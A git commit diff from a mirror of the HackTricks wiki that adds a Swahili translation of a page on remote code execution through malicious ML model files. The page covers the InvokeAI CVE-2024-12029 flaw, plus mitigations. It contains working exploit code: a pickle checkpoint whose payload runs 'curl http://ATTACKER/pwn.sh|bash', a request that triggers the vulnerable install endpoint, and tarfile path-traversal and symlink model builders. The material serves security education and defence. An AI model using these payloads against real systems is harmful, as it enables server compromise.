maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/AI/AI-Models-RCE.md'] to sw

Browse Source
This commit is contained in:
Translator 2025-07-18 22:09:57 +00:00
parent b4c2fe9efa
commit 9ebebb51bd
1 changed files with 110 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

114
src/AI/AI-Models-RCE.md
View File

@ -4,7 +4,7 @@
## Loading models to RCE
Machine Learning models mara nyingi hushirikiwa katika mifumo tofauti, kama ONNX, TensorFlow, PyTorch, n.k. Mifano hii inaweza kupakuliwa kwenye mashine za waendelezaji au mifumo ya uzalishaji ili kuitumia. Kawaida mifano haipaswi kuwa na msimbo mbaya, lakini kuna baadhi ya kesi ambapo mfano unaweza kutumika kutekeleza msimbo wa kiholela kwenye mfumo kama kipengele kilichokusudiwa au kwa sababu ya udhaifu katika maktaba ya kupakia mfano.
Modeli za Machine Learning kawaida hushirikiwa katika mifumo tofauti, kama ONNX, TensorFlow, PyTorch, n.k. Hizi modeli zinaweza kupakuliwa kwenye mashine za waendelezaji au mifumo ya uzalishaji ili kuzitumia. Kawaida, modeli hazipaswi kuwa na msimbo mbaya, lakini kuna baadhi ya kesi ambapo modeli inaweza kutumika kutekeleza msimbo wa kiholela kwenye mfumo kama kipengele kilichokusudiwa au kwa sababu ya udhaifu katika maktaba ya kupakia modeli.
Wakati wa kuandika, haya ni baadhi ya mifano ya aina hii ya udhaifu:
@ -23,11 +23,80 @@ Wakati wa kuandika, haya ni baadhi ya mifano ya aina hii ya udhaifu:
| **Keras (older formats)** | *(No new CVE)* Legacy Keras H5 model | Malicious HDF5 (`.h5`) model with Lambda layer code still executes on load (Keras safe_mode doesnt cover old format “downgrade attack”) | |
| **Others** (general) | *Design flaw* Pickle serialization | Many ML tools (e.g., pickle-based model formats, Python `pickle.load`) will execute arbitrary code embedded in model files unless mitigated | |
Zaidi ya hayo, kuna mifano kadhaa ya python pickle kama zile zinazotumiwa na [PyTorch](https://github.com/pytorch/pytorch/security) ambazo zinaweza kutumika kutekeleza msimbo wa kiholela kwenye mfumo ikiwa hazijapakiwa na `weights_only=True`. Hivyo, mfano wowote wa pickle unaweza kuwa na hatari maalum kwa aina hii ya mashambulizi, hata kama haujatajwa kwenye jedwali hapo juu.
Zaidi ya hayo, kuna baadhi ya modeli za python pickle kama zile zinazotumiwa na [PyTorch](https://github.com/pytorch/pytorch/security) ambazo zinaweza kutumika kutekeleza msimbo wa kiholela kwenye mfumo ikiwa hazijapakiwa na `weights_only=True`. Hivyo, modeli yoyote inayotegemea pickle inaweza kuwa na hatari maalum kwa aina hii ya mashambulizi, hata kama hazijatajwa kwenye jedwali hapo juu.
Mfano:
### 🆕 InvokeAI RCE via `torch.load` (CVE-2024-12029)
- Create the model:
`InvokeAI` ni kiolesura maarufu cha wavuti cha chanzo wazi kwa Stable-Diffusion. Matoleo **5.3.1 5.4.2** yanaonyesha mwisho wa REST `/api/v2/models/install` ambao unaruhusu watumiaji kupakua na kupakia modeli kutoka URL za kiholela.
Ndani, mwisho huu hatimaye unaita:
```python
checkpoint = torch.load(path, map_location=torch.device("meta"))
```
Wakati faili iliyotolewa ni **PyTorch checkpoint (`*.ckpt`)**, `torch.load` inafanya **pickle deserialization**. Kwa sababu maudhui yanatoka moja kwa moja kwenye URL inayodhibitiwa na mtumiaji, mshambuliaji anaweza kuingiza kitu kibaya chenye njia ya `__reduce__` iliyobinafsishwa ndani ya checkpoint; njia hiyo inatekelezwa **wakati wa deserialization**, ikisababisha **remote code execution (RCE)** kwenye seva ya InvokeAI.
Uthibitisho wa udhaifu ulipatiwa **CVE-2024-12029** (CVSS 9.8, EPSS 61.17 %).
#### Mwongozo wa unyakuzi
1. Tengeneza checkpoint mbaya:
```python
# payload_gen.py
import pickle, torch, os
class Payload:
def __reduce__(self):
return (os.system, ("/bin/bash -c 'curl http://ATTACKER/pwn.sh|bash'",))
with open("payload.ckpt", "wb") as f:
pickle.dump(Payload(), f)
```
2. Kuweka `payload.ckpt` kwenye seva ya HTTP unayodhibiti (mfano `http://ATTACKER/payload.ckpt`).
3. Chochea kiunganishi kilichohatarishwa (hakuna uthibitisho unaohitajika):
```python
import requests
requests.post(
"http://TARGET:9090/api/v2/models/install",
params={
"source": "http://ATTACKER/payload.ckpt", # remote model URL
"inplace": "true", # write inside models dir
# the dangerous default is scan=false → no AV scan
},
json={}, # body can be empty
timeout=5,
)
```
4. Wakati InvokeAI inaposhusha faili inaita `torch.load()` → gadget ya `os.system` inakimbia na mshambuliaji anapata utekelezaji wa msimbo katika muktadha wa mchakato wa InvokeAI.
Exploit iliyotengenezwa tayari: **Metasploit** moduli `exploit/linux/http/invokeai_rce_cve_2024_12029` inaweka mchakato mzima kuwa otomatiki.
#### Masharti
• InvokeAI 5.3.1-5.4.2 (bendera ya skana ya kawaida **false**)
`/api/v2/models/install` inapatikana na mshambuliaji
• Mchakato una ruhusa za kutekeleza amri za shell
#### Mipango ya Kuzuia
* Pandisha hadi **InvokeAI ≥ 5.4.3** patch inafanya `scan=True` kuwa ya kawaida na inafanya uchunguzi wa malware kabla ya deserialization.
* Wakati wa kupakia checkpoints kwa njia ya programu tumia `torch.load(file, weights_only=True)` au [`torch.load_safe`](https://pytorch.org/docs/stable/serialization.html#security) msaidizi mpya.
* Lazimisha orodha za ruhusa / saini za vyanzo vya modeli na endesha huduma hiyo kwa ruhusa ndogo.
> ⚠️ Kumbuka kwamba **aina yoyote** ya muundo wa pickle wa Python (ikiwemo faili nyingi za `.pt`, `.pkl`, `.ckpt`, `.pth`) kwa asili si salama kutekeleza kutoka vyanzo visivyoaminika.
---
Mfano wa mipango ya kuzuia ya ad-hoc ikiwa lazima uendelee kutumia toleo za zamani za InvokeAI nyuma ya proxy ya kurudi:
```nginx
location /api/v2/models/install {
deny all; # block direct Internet access
allow 10.0.0.0/8; # only internal CI network can call it
}
```
## Mfano kuunda mfano mbaya wa PyTorch
- Unda mfano:
```python
# attacker_payload.py
import torch
@ -62,4 +131,41 @@ model.load_state_dict(torch.load("malicious_state.pth", weights_only=False))
# /tmp/pwned.txt is created even if you get an error
```
## Models to Path Traversal
Kama ilivyoelezwa katika [**hiki blogu**](https://blog.huntr.com/pivoting-archive-slip-bugs-into-high-value-ai/ml-bounties), muundo wa modeli nyingi zinazotumiwa na mifumo tofauti ya AI unategemea archives, mara nyingi `.zip`. Hivyo, inaweza kuwa inawezekana kutumia muundo huu kufanya mashambulizi ya path traversal, kuruhusu kusoma faili za kawaida kutoka kwa mfumo ambapo modeli imepakuliwa.
Kwa mfano, kwa kutumia msimbo ufuatao unaweza kuunda modeli ambayo itaunda faili katika saraka ya `/tmp` wakati inapo pakuliwa:
```python
import tarfile
def escape(member):
member.name = "../../tmp/hacked" # break out of the extract dir
return member
with tarfile.open("traversal_demo.model", "w:gz") as tf:
tf.add("harmless.txt", filter=escape)
```
Au, kwa kutumia msimbo ufuatao unaweza kuunda mfano ambao utaunda symlink kwa saraka ya `/tmp` wakati inapo load:
```python
import tarfile, pathlib
TARGET = "/tmp" # where the payload will land
PAYLOAD = "abc/hacked"
def link_it(member):
member.type, member.linkname = tarfile.SYMTYPE, TARGET
return member
with tarfile.open("symlink_demo.model", "w:gz") as tf:
tf.add(pathlib.Path(PAYLOAD).parent, filter=link_it)
tf.add(PAYLOAD) # rides the symlink
```
## References
- [OffSec blog "CVE-2024-12029 InvokeAI Deserialization of Untrusted Data"](https://www.offsec.com/blog/cve-2024-12029/)
- [InvokeAI patch commit 756008d](https://github.com/invoke-ai/invokeai/commit/756008dc5899081c5aa51e5bd8f24c1b3975a59e)
- [Rapid7 Metasploit module documentation](https://www.rapid7.com/db/modules/exploit/linux/http/invokeai_rce_cve_2024_12029/)
- [PyTorch security considerations for torch.load](https://pytorch.org/docs/stable/notes/serialization.html#security)
{{#include ../banners/hacktricks-training.md}}